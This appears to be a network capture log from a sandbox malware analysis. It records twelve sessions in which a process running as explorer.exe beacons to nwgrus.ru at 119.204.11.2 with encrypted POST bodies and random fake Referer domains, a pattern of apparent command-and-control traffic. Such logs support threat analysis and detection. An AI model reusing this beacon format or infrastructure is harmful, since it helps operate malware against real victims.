Oct 12, 2024 20:07:29.861692905 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://saaiglxgesx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 328 Host: nwgrus.ru
Oct 12, 2024 20:07:29.861723900 CEST	328	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 29 02 eb 92 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu)rq\;LDd1h>O_ew62'E<jI=4{MPz<Ex^W:SUZhXu[CYa]i O
Oct 12, 2024 20:07:31.374404907 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:31 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49809	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:31.386056900 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wmicpxlifessw.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 331 Host: nwgrus.ru
Oct 12, 2024 20:07:31.386091948 CEST	331	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 78 58 e7 ae Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuxX\|Nu4a<~bf?[C5;R3?:S@vb9E7.c .] XDltQ:#T}BiW;6@xR\
Oct 12, 2024 20:07:32.890898943 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:32 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49820	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:32.899426937 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vbthucuxeraia.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 221 Host: nwgrus.ru
Oct 12, 2024 20:07:32.899456024 CEST	221	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3b 0e aa 9c Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu;WUZY`>S`E,G4A5=U$mHGUi}e_y}9`.cq\'QN$~G
Oct 12, 2024 20:07:34.426244020 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:34 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49831	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:34.435060024 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fhouqknummbbf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 185 Host: nwgrus.ru
Oct 12, 2024 20:07:34.435089111 CEST	185	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 5f 26 a1 f8 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu_&5\YjMQ{^O@\F,W7=U;hmS\")jL]QdWc
Oct 12, 2024 20:07:35.946641922 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49841	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:35.956039906 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://onlnloemqmkdhio.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 129 Host: nwgrus.ru
Oct 12, 2024 20:07:35.956039906 CEST	129	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2b 2a ea 8d Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu+*@o{j}${{ULMeQ
Oct 12, 2024 20:07:37.458920956 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:37 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49849	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:37.467190981 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xrccmhuqkqkddsnr.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 227 Host: nwgrus.ru
Oct 12, 2024 20:07:37.467225075 CEST	227	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 40 09 e7 8e Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu@Y{_J^\|wdxq/gR:Yu+O\3t/$?QD4D8rDA"W=q;kDBf
Oct 12, 2024 20:07:38.958609104 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:38 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49861	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:38.966912031 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sgoujgwybxsges.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 141 Host: nwgrus.ru
Oct 12, 2024 20:07:38.967140913 CEST	141	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 6e 35 d3 a0 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vun5\h]\|ntnn K76\|SM`9]
Oct 12, 2024 20:07:40.481789112 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49870	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:40.490367889 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jousimacigldf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 303 Host: nwgrus.ru
Oct 12, 2024 20:07:40.490377903 CEST	303	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 25 2e bf 8b Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu%.]vnu+=-i`MaG?SH>*1?JD75\|1MMBFoE?(]Kk!qBuXbex;6`
Oct 12, 2024 20:07:41.972019911 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49881	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:41.982127905 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sswxpvuufbvykyb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: nwgrus.ru
Oct 12, 2024 20:07:41.982155085 CEST	140	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 6c 2f f3 91 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vul/wlXj3bq*[}byLIM"T~
Oct 12, 2024 20:07:43.473678112 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:43 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49892	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:43.483773947 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cdinohvnolrheurg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 338 Host: nwgrus.ru
Oct 12, 2024 20:07:43.483793020 CEST	338	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 6c 46 bf f6 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vulF)iN~+(E[OwNm9G9IaR\2rO%sdCS@UY?gArM&p:VX!1S5DI>
Oct 12, 2024 20:07:44.967206001 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49903	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:44.975231886 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lifadhlvdwb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 137 Host: nwgrus.ru
Oct 12, 2024 20:07:44.975404024 CEST	137	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 4f 2e c9 a5 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuO.N~LV<ts;3C58
Oct 12, 2024 20:07:46.457277060 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:07:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49914	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:07:46.465318918 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ssfieliemcmj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 236 Host: nwgrus.ru
Oct 12, 2024 20:07:46.465373039 CEST	236	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 4c 28 c6 8d Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuL(unMZS:34ne[J7OW/nYDFiG[Q$7\|,#o]i[+c}$T"m
